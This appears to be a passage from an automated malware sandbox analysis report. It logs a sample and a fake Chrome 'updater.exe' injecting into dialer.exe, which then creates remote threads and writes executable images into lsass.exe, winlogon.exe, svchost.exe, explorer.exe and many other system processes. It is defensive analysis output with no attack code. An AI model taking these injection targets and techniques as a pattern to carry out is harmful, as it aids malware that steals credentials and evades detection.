Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: ECD72908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 590A2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A9ED2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 731C2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4E8C2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 47B62908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 70092908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 84292908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: A4152908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: BDF32908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: C0262908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: C9F32908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 645B2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7B2A2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4F62908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 2AB42908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4ADB2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\spoolsv.exe EIP: 1992908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 25DA2908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: F5352908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: F0D62908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: FFB2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C2572908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8BCF2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 66982908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 13EF2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8D572908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 69B42908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CC742908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5DA72908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 199D2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F3892908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3B82908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 40E42908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A6532908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 27BC2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7B152908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 621A2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2F482908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8B4B2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 683D2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 1382908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2E262908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6C5E2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D5932908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FC652908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 78742908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 33B42908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8D0A2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AB4C2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2A642908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6CF32908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 49352908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 60DA2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5E7B2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2F7C2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E8152908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 52342908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9DA92908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 602E2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 197C2908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F1A02908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: BE342908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 23A12908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FD902908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C2A32908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: B2662908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2C892908
Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\conhost.exe EIP: 8E642908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 24892908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A2282908
Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A22E2908
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe NtAdjustPrivilegesToken: Direct from: 0x7FF750F65BFE
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe NtQuerySystemInformation: Direct from: 0x7FF6A0405BFE
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAE260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87F40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 179537D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 25306E90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D5590A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD731C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21B47B60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20870090000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17184290000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 29166980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\explorer.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F4197C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dllhost.exe base: 228BE340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 20823A10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 144B2660000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 1988E640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F724890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe Memory written: PID: 2580 base: 1380000 value: 4D
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Section loaded: NULL target: unknown protection: readonly
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Thread register set: target process: 5796
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Thread register set: target process: 6252
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Thread register set: target process: 6208
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Thread register set: target process: 1668
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe Memory written: C:\Windows\System32\dialer.exe base: 25C231F010
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAE260000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B380000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B3F0000
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Memory written: C:\Windows\System32\dialer.exe base: EF5FC0B010
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Memory written: C:\Windows\System32\dialer.exe base: 2549FAF010
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Memory written: C:\Windows\System32\dialer.exe base: 6F4E4CF010
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661330000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87F40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 179537D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D590000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 25306E90000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B940000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADECD70000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D5590A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9ED0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD731C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E8C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21B47B60000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20870090000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17184290000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 29166980000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\explorer.exe base: 1380000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F4197C0000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1F8F1A00000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dllhost.exe base: 228BE340000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\conhost.exe base: 20823A10000
Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000
